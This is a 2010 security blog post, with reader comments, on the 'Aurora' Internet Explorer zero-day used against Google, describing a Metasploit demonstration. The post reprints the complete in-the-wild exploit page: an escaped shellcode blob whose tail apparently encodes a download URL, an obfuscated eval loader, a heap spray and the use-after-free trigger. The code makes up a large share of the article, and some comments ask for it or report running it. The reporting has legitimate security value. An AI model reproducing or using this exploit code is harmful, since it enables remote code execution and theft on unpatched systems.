// you’re reading...

Remote Exploit

The “Aurora” IE Exploit Used Against Google in Action

By Prefect January 15, 2010 Print This Post Print This Post Post a comment
Filed Under  , , , , ,

google_borealis

The big news hit earlier this week that the attack vector that allowed bad actors presumably from China into the networks of Google, Juniper, Adobe, and some 29 other firms was an Internet Explorer zero day, a use after free vulnerability on an invalid pointer reference affecting IE 6, 7, and 8 but only used by attackers on IE 6 according to Microsoft. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution. Earlier today this entry from yesterday at Wepawet (an online analysis engine for malware) was pointed out to H.D. Moore, and within hours Metasploit has an exploit of the vulnerability integrated. McAfee has confirmed that the exploit is out and the same one they saw during the investigation. The video below demonstrates how crackers initially gained access to the corporate networks of Google, et al. using this zero day attack.

Here It Is

The video below demonstrates how Google and the rest have been, according to most news reports, exploited via the “Aurora” vulnerability in Internet Explorer, and had their “intellectual property” taken.

In the video you will see Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.

A silly example for demonstration to be sure, but once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.


The Vector

The attack scenario is that users were pointed to a web site (probably through a targeted Spam e-mail, an attack called spear phishing) containing a JavaScript that references this invalid pointer and injects the included shell code. The code below was released publicly yesterday.

<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
  arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
  );
  cc = cc.replace(/@/g, ",");
  eval(cc);
  var x1 = new Array();
  for (i = 0; i < 200; i ++ ){
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
  }
  ;
  var e1 = null;
  function ev1(evt){
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
  }
  function ev2(){
    p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < x1.length; i ++ ){
      x1[i].data = p;
    }
    ;
    var t = e1.srcElement;
  }
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>

Update

  • Ahmed Obied has published a clean python version of the exploit (opens your Windows Calculator) for testing also: ie_aurora.py.
  • CVE-2010-0249 has been opened for this issue.

Finally

“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.” – Microsoft.

This situation has the potential to change rapidly now that it appears the exploit has been found. Microsoft last patched a vulnerability off cycle in July of 2009, they could elect to pursue the same response here.

Or as McAfee correctly opines: “What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.”

Bookmark and Share

Related Posts:


Discussion

50 comments for “The “Aurora” IE Exploit Used Against Google in Action”

  1. You’re deluded if you think your video is a good presentation of something. No future in video production for you.

    Posted by Bill Dudly | January 15, 2010, 9:36 PM

  2. [...] VIDEO OF EXPLOIT IN ACTION [...]

    Posted by Emmanuel Computer Consulting, L.L.C. » Blog Archive » IE Opens Your System to Baddies again. Breathe deeply and say: Firefox, Chrome | January 15, 2010, 10:13 PM

  3. Dudlifier – Cute… Its not exactly our day job, we do have a few other things going on over here.

    That’s what an attack looks like though, a listener is running, a malicious site is setup, the user visits it, and malicious processes start running in the context of that user. That’s it, no loud noises, no explosions, no flashing red lights, no mustache stroking villains. You want that, you’ve come to the wrong outpost on the Intertubes.

    Although chances are if you don’t know what you’re looking at, you’re probably in the wrong place anyway. How did you end up on an information security blog?

    Thanks for the constructive comment though buddy boy. Come back anytime.

    Posted by Prefect | January 15, 2010, 10:31 PM

  4. One thing I don’t understand : How is that possible ? I mean we’re talking about Google, all people interrested in security know that Google is well known for its high level of securtiy. This 0 day shows that Google is actually using IE6 for some Googler ? Unbelievable. Even if it works for IE6,7,8 I tought computers at GooglePlex, had a lot of protections for the stack, AV, firewall, IDS ect …

    Posted by Eno | January 16, 2010, 12:52 AM

  5. I would have figured that a company as organized as Google would mandate their own browser, Chrome, on every desktop. Or at least have policy in place to use anything, anything but IE6.

    Posted by Anon | January 16, 2010, 1:40 AM

  6. [...] 2003, Vista, Server 2008, Windows 7 and Server 2008 R2. You can see the exploit in action over here. Microsoft has published a security advisory and is working on a patch. In the meantime, it is [...]

    Posted by Google Hack Attack (Operation Aurora): What We Know | January 16, 2010, 2:00 AM

  7. Think about it: A software company needs to have a handle on how its products work in many environments. This means occasionally relinquishing control to the windy browsers of fate. C’est la vie…

    Posted by JP | January 16, 2010, 3:19 AM

  8. According to McAfee CTO, IE6 wasn’t the only browser used as attack vector in these attacks. IE7 and 8 were also used in a different way which we still don’t know.

    Posted by NotOnly | January 16, 2010, 3:30 AM

  9. [...] können, dass die Angriffe von der chinesischen Regierung kamen (McAfee spricht vom Projekt “Aurora“). Die Regierung täte gut daran, mit aufzuklären. Dass sie (die offiziell Zensur immer [...]

    Posted by Google & the “Great Chinese Firewall” (Update). « RaheBlog | January 16, 2010, 8:46 AM

  10. [...] “After McAfee’s disclosure of an IE 0-day vulnerability this week that had been used in Operation Aurora, the hack and stealing of data from Google, Adobe and about 3 dozen other major companies, the [...]

    Posted by German Government Advises Public To Stop Using IE | JetLib News | January 16, 2010, 9:10 AM

  11. Here’s my take: It’s all about defense in depth. I have some thoughts on the attack on my blog (http://miwsecurity.blogspot.com/2010/01/2010-coming-out-of-defense-in-depth.html).

    The biggest issue as far as I can tell is that the present lip service given to internal systems MUST come to an end. Everyone seems to be spending their entire security budget on perimeter defenses and not enough on security training and internal controls. Seriously…spear phishing? That’s a complete falldown of security awareness training if you ask me.

    Has anyone attempted to run this code against a workstation with Cisco Security Agent or a similar HIPS application installed?

    Graham

    Posted by Graham Thompson | January 16, 2010, 10:34 AM

  12. [...] [...]

    Posted by Internet Explorer Google China Hack - Ariotek Forums | January 16, 2010, 11:55 AM

  13. Does the MetaSploit or the in-the-wild attack leave any tangible evidence in system32? I’m currently handling an incident with some undetected malware which leaves around 5-12 files in system32. It look like maybe a variant of netsky, but then again some of the code could be shared. I doubt it’s the same, but it would be nice to have more details about what’s left behind.

    Posted by Michael Starks | January 16, 2010, 12:50 PM

  14. @MICHAEL STARKS: how can your sploit be undetectable if it leaves files? Also: if you have a directory called system32 then you’re probably hacked. Because you’re stupid. Instead of researching stupid Windows malware, why don’t you get to a safe platform? Too stupid to meet that challenge? Guess so.

    @GRAHAM THOMPSON: Close only counts in horseshoes. People are wasting money on Windows. Want me to take that again or are you of above average intelligent and got that first time around? And the Cisco guys are still running Windows stuff? You mean they’re stupid too? Gosh!

    @NOTONLY: No not in a different way. He did not say that. They were used in the same way.

    @JP: I have thought about it. It’s you who haven’t thought about it. They can sandbox Windows. Anyone who absolutely has to run Windows and doesn’t sandbox it is a fool.

    @PREFECT: way cool. FTW!

    Posted by Chrome | January 16, 2010, 4:17 PM

  15. LOL @CHROME: Nobody likes a linux fan boy, they have less social skills than their OS! Linux is great for a server, but if you truly think it’s a better desktop OS than Windows, then you sir are the fool!

    You didn’t say Linux, but you’re not cool enough to own a Mac… I’m guessing Ubuntu!

    Posted by TJ | January 16, 2010, 11:14 PM

  16. Perhaps the arguments that open source, available to everyone to find and fix security flaws, make a little more sense, now. I’d guess that the Chinese have been diligently studying Windows source since MS handed it over to them in 2003. They probably have a whole portfolio of 0-day’s in a folder.

    Posted by dwyatt | January 17, 2010, 3:12 AM

  17. First medication to this ailment

    Organizations and individuals should stop using the really crappy IE. I wonder why no one is mentioning that!

    Posted by ghabuntu | January 17, 2010, 3:27 AM

  18. Lol Dwyatt, I perfectly agree with you. I’d say they have a full dossier in an entire warehouse

    Posted by ghabuntu | January 17, 2010, 3:30 AM

  19. f you have a directory called system32 then you’re probably hacked. Because you’re stupid.

    yo..that’s rich ,seriously.

    Posted by senyorita | January 17, 2010, 4:35 AM

  20. @BILL DUDLY: why not a good presentation?. Bill I don’t want to think you still believe in “Security through obscurity”, if this so, you are deluded, man. To share this knowledge let us open our eyes and let everyone open their eyes – if you want to open them -.

    @TJ: Maybe Windows or MacOS are mature OS’s, also Linux is growing up too… Anyway I am Linux boy, sometimes a Mac boy and sometimes a Windows boy, each one fills a need at a given time… In security no matter what OS you are using, all of these are hackable. Just is required a time of research… Security is a chain and one of the weakest link is THE USER. Sometimes, some users are really stupid, other times they just does not have enough knowledge of what they are facing on internet, maybe because they are not (well) trained.

    To Reduce the Risk of Vector Attack on Users-Side (Client-Side exploitation) maybe could be a good idea to use this equation: (Training + Knowledge) + Common Sense.

    @praetorianprefect.com: Good job guys! Follow in this way.

    Posted by Felipe | January 17, 2010, 6:27 AM

  21. Just downloaded java.sun.com/products/archive/hotjava/3.0/index.html HotJava-3.0 browser. Looks quite nice and clean, strips stupid ad stuff. Cross platform, no os fanboy fights. Probably not targetted for exploits. Looks good as a workaround while MS fixes IE. Might be confident enough to visit a porn site again.

    Posted by Re Treat | January 17, 2010, 8:19 AM

  22. [...] Demostración de cómo funciona el "Exploit" de IE usado en los ataques a Google [ENG]  praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit…  por crises hace 2 segundos [...]

    Posted by Demostración de cómo funciona el "Exploit" de IE usado en los ataques a Google [ENG] | January 17, 2010, 9:15 AM

  23. To those who lambasted me for running windows, bla bla bla, I can only assume you have never worked as an infosec professional in an enterprise setting, and have never helped a customer with a security problem in a typical environment. That’s really all I have to say on the matter..

    Posted by Michael Starks | January 17, 2010, 10:38 AM

  24. [...] , mai detaliat jos + video cu asa ceva in actiunea. Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action __________________ paxnWo: vreau sa fac dragoste cu black Kabron: =))) Kestor: [...]

    Posted by Reproducing the "Aurora" IE Exploit - Romanian Security Team - SECURITY RESEARCH | January 17, 2010, 10:56 AM

  25. [...] in action and some of the source code: http://www.darkreading.com/vulnerabi…leID=222301235 Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action Reply With Quote   + Reply to Thread « Bulletproof [...]

    Posted by Why You Shouldn't Use IE | January 17, 2010, 5:08 PM

  26. [...] gracias a los amigos de http://praetorianprefect.com que han hecho un video que muestra cómo inicialmente los crackers consiguieron acceso a las redes [...]

    Posted by MyGeekSide » Blog Archive » Cómo fue el ataque a Google por parte de China | January 17, 2010, 7:47 PM

  27. [...] gracias a los amigos de http://praetorianprefect.com que han hecho un video que muestra cómo inicialmente los crackers consiguieron acceso a las redes [...]

    Posted by Cómo fue el ataque a Google por parte de China | Tecnología Nerd | January 17, 2010, 7:55 PM

  28. Very informative video and information. Thanks.

    Posted by Samuel Lai | January 17, 2010, 8:33 PM

  29. [...] I’m happy to note that according to Google Analytics only 28% of you are using Internet Explorer. My hat’s off to 72% of you. If you are in that other 28%, however, unless you like your personal data compromised or you want to feel the thrill of having your PC ride in a botnet herd, use it to download Chrome or Firefox or Opera or Safari or whatever and don’t open it again until Microsoft gets out a patch for the Aurora exploit. [...]

    Posted by Internet Explorer Aurora Exploit in the Wild | Fuzzy Tolerance | January 17, 2010, 9:26 PM

  30. Dont FXXXing understand why every time those US com have any hacking problem would point their fingers on others, bloody di-ck head.

    You made the software, you sell it, you get the profit, and dont want to get blame, it’s your fault not to produce a better one, and then when sh-it happen, just try to blame others, first off Russian, then middle-east, then Gaza, then now the Chinese, why dont you point it to yourself ? simply ignore the fact and blame others.

    Posted by Racist US | January 18, 2010, 12:44 AM

  31. [...] questo interessante video. Che dire? scary… Io elimino ie dal mio ufficio oggi stesso. Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action __________________ FlareVM.it: Server Virtuali Xen con risorse garantite a partire da [...]

    Posted by Google exploit | January 18, 2010, 7:06 AM

  32. Thanks for taking the time to show us how it works in action.

    Posted by ANON2 | January 18, 2010, 12:41 PM

  33. It doesn’t work for me. When user opens the site I get: “Sending Microsoft Internet Explorer “Aurora” Memory Corruption to client”

    I have metasploit: =[ metasploit v3.3.4-dev [core:3.3 api:1.0] + — –=[ 492 exploits – 230 auxiliary + — –=[ 192 payloads – 23 encoders – 8 nops =[ svn r8144 updated today (2010.01.18)

    Posted by jrusi | January 18, 2010, 1:54 PM

  34. @Chrome: Not sure what you mean? Cisco guys running Windows? Close only counts with horseshoes? The only context Cisco came up in was if Cisco Security Agent (or other HIPS product) was able to protect an unpatched machine…As for horseshoes…?

    Anyways, thanks to Praetoria for the excellent posting on this attack!

    Posted by Graham Thompson | January 18, 2010, 2:02 PM

  35. [...] Detailed info about Operation Aurora. AKPC_IDS += "408,";Popularity: unranked [?] Inderjeet Singh is the founder and main author of [...]

    Posted by Google Hack Attack (Operation Aurora) in Action | January 18, 2010, 3:49 PM

  36. [...] gracias a los amigos de http://praetorianprefect.com que han hecho un video que muestra cómo inicialmente los crackers consiguieron acceso a las redes [...]

    Posted by Como se fue el ataque Aurora contra Google | January 18, 2010, 5:02 PM

  37. [...] [...]

    Posted by Alemania Recomienda No Usar IE | January 18, 2010, 5:58 PM

  38. [...] at all you’ll know that the zero-day vulnerability codenamed Aurora (watch it in action on Praetorian Prefect) in Microsoft’s popular Internet Explorer web browser was the cause of the security breaches. [...]

    Posted by Germany & France Say Abandon IE, Microsoft Agrees | Piffey | January 18, 2010, 6:10 PM

  39. [...] The attack against Google has been picked apart; a zero-day exploit in Internet Explorer was the method. The method was covered at CNET and is described in detail by McAfee’s CTO, George Kurtz, in a blog post. The blog Praetorian Prefect has a description and video of the attack in action. [...]

    Posted by Google Hacked by Chinese Government « UNIX Administratosphere | January 18, 2010, 7:34 PM

  40. j’ ai besoin de quelqu’”un qui peut me faire comprendree un peu le shell employé ici svp, je suis impatie,t;)good thanks for help kastos@live.com

    Posted by nasreddine | January 19, 2010, 4:15 AM

  41. [...] Video – Metasploit / “Aurora” IE Exploit: [1] http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/ [...]

    Posted by Kontrollverlust durch “Operation Aurora” ? – kritische Sicherheitslücke im Internet Explorer - IT-Professional Blog - Port 389 | January 19, 2010, 5:51 AM

  42. Could you please publish the actual code of the exploit?

    Posted by Nik | January 19, 2010, 6:56 AM

  43. [...] de populaire hacktool Metasploit is de exploit voor dit lek nu bekendgemaakt.  Daarmee wordt het mogelijk een website neer te zetten waarmee het lek wordt misbruikt.  Het [...]

    Posted by Remco Wolvenne » Blog Archive » Gevaarlijke lek IE | January 19, 2010, 9:48 AM

  44. [...] Praetorian Prefect Seguimiento de George KurtzCTO El blog de Sergio Hernando [...]

    Posted by Internet explorer: KO técnico | El Blog de William | January 19, 2010, 11:29 AM

  45. [...] сам эксплойт. Ссылка на Praetorian Project. Ссылки на сплойт:  [...]

    Posted by Операция «Aurora». Удар по Google и другим » Информационная безопасность » plate.pp.ua | January 20, 2010, 9:47 AM

  46. [...] praetorianprefect – Demonstration of exploiting the flaw using the new module from Metasploit: http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/ [...]

    Posted by CVE-2010-0249 – Exploit – Comele – Hydraq – Aurora – IExplorer 0day « Weblog for all users. | January 20, 2010, 2:09 PM

  47. [...] cycle. The update is for the Internet Explorer vulnerability which was reported to be used by the Aurora exploit to attack Google and several other companies. The last time Microsoft released an out of band patch [...]

    Posted by Praetorian Prefect | Microsoft Posts Advanced Notification for Out of Band Patch | January 20, 2010, 7:31 PM

  48. [...] in question affects all versions of Internet Explorer since IE 6 and can be seen in action over here. Microsoft is expected to release a patch later today to fix the [...]

    Posted by Downloads of Firefox and Opera Soar in Germany Following Government Advisory | January 21, 2010, 8:41 AM

  49. Excellent presentation, as always. It worries me that people are still using IE6, pretty much proven to be the most insecure browser in the history of browsing, though.

    Posted by Gabriel | January 21, 2010, 12:44 PM

  50. [...] (under review) And some more random links: Code Used in Google Attack Now Public : programming Praetorian Prefect | The “Aurora” IE Exploit Used Against Google in Action [...]

    Posted by Internet Explorer Zero Day attack - Remote Exploit Forums | January 21, 2010, 6:59 PM

Post a comment